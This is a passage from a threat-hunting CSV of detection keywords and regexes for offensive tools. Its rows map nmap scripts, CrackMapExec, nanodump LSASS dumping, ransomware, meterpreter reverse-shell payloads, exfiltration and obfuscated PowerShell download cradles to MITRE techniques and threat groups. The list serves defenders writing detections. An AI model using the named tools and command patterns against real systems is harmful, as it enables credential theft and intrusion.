T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3665" "* versant-info.nse*",".{0,1000}\sversant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3666" "* victim_info_key.py*",".{0,1000}\svictim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3667" "* --victimdn *",".{0,1000}\s\-\-victimdn\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3668" "*----- VIRTUALALLOC HOOK -----*",".{0,1000}\-\-\-\-\-\sVIRTUALALLOC\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","3669" "* vmauthd-brute.nse*",".{0,1000}\svmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3670" "* vmware-version.nse*",".{0,1000}\svmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3671" "* --vnc localhost:5900 --listen 5980*",".{0,1000}\s\-\-vnc\slocalhost\:5900\s\-\-listen\s5980.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","3672" "* vnc-brute.nse*",".{0,1000}\svnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3674" "* vnc-info.nse*",".{0,1000}\svnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3675" "* vnc-title.nse*",".{0,1000}\svnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3676" "* voldemort-info.nse*",".{0,1000}\svoldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3677" "* Volumiser.exe *",".{0,1000}\sVolumiser\.exe\s.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","3678" "* vtam-enum.nse*",".{0,1000}\svtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3680" "* -vulnerable -stdout -hide-admins*",".{0,1000}\s\-vulnerable\s\-stdout\s\-hide\-admins.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3681" "* vulners.nse*",".{0,1000}\svulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3682" "* vulscan.nse*",".{0,1000}\svulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","3683" "* vuze-dht-info.nse*",".{0,1000}\svuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3684" "* -w wordlist/*.txt*http*",".{0,1000}\s\-w\swordlist\/.{0,1000}\.txt.{0,1000}http.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3688" "* Waitfor-Persistence.ps1*",".{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","3689" "* -watson -Command *",".{0,1000}\s\-watson\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy 
usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3690" "* wcreddump (windows credentials dump)*",".{0,1000}\swcreddump\s\(windows\scredentials\sdump\).{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows #content","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3691" "* wcreddump.py*",".{0,1000}\swcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3692" "* wdb-version.nse*",".{0,1000}\swdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3693" "* --wdigest disable*",".{0,1000}\s\-\-wdigest\sdisable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3694" "* --wdigest enable*",".{0,1000}\s\-\-wdigest\senable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3695" "* web-hacking-toolkit *",".{0,1000}\sweb\-hacking\-toolkit\s.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","N/A","2","N/A","N/A","N/A","N/A","3697" "* weblogic-t3-info.nse*",".{0,1000}\sweblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3698" "* -WebRoot C:\inetpub\wwwroot\SecretServer*",".{0,1000}\s\-WebRoot\sC\:\\inetpub\\wwwroot\\SecretServer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","3699" "* --weekday-warrior -*",".{0,1000}\s\-\-weekday\-warrior\s\-.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","3701" "* --werfault *\temp\*",".{0,1000}\s\-\-werfault\s.{0,1000}\\temp\\.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3702" "* wget ""https://*/interactshbuild*",".{0,1000}\swget\s\""https\:\/\/.{0,1000}\/interactshbuild.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","3703" "* WHERE TABLE_NAME like 'C2AGENTS'*",".{0,1000}\sWHERE\sTABLE_NAME\slike\s\'C2AGENTS\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3705" "* WHERE TABLE_NAME like 'C2COMMANDS'*",".{0,1000}\sWHERE\sTABLE_NAME\slike\s\'C2COMMANDS\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. 
It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3706" "* whoami > zzz.txt*",".{0,1000}\swhoami\s\>\szzz\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","https://github.com/r00t-3xp10it/redpill","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3707" "* whois-domain.nse*",".{0,1000}\swhois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3708" "* whois-ip.nse*",".{0,1000}\swhois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3709" "* will be obfuscated and integrated in created documents*",".{0,1000}\swill\sbe\sobfuscated\sand\sintegrated\sin\screated\sdocuments.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","3710" "* will be written to PME\*",".{0,1000}\swill\sbe\swritten\sto\sPME\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3711" "* WinBruteLogon.zip*",".{0,1000}\sWinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3713" "* windapsearch.py*",".{0,1000}\swindapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3714" "* winDefKiller *",".{0,1000}\swinDefKiller\s.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","3715" "* Windows Recall feature found. 
Do you want to proceed with the extraction?*",".{0,1000}\sWindows\sRecall\sfeature\sfound\.\sDo\syou\swant\sto\sproceed\swith\sthe\sextraction\?.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3716" "* Windows Recall feature not found. Nothing to extract*",".{0,1000}\sWindows\sRecall\sfeature\snot\sfound\.\sNothing\sto\sextract.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3717" "* windows/csharp_exe*",".{0,1000}\swindows\/csharp_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - 
TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3718" "* windows/meterpreter/reverse_tcp*",".{0,1000}\swindows\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3719" "* windows/shell/bind_tcp *",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","3720" "* windows/shell/bind_tcp *shellcode*",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","3721" "* windows_downdate.py*",".{0,1000}\swindows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","3722" "* Windows-Passwords.ps1*",".{0,1000}\sWindows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","3723" "* -wINdOwstYL Hi -nop -eXecU BYpAss -COm *",".{0,1000}\s\-wINdOwstYL\sHi\s\-nop\s\-eXecU\sBYpAss\s\-COm\s\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to 
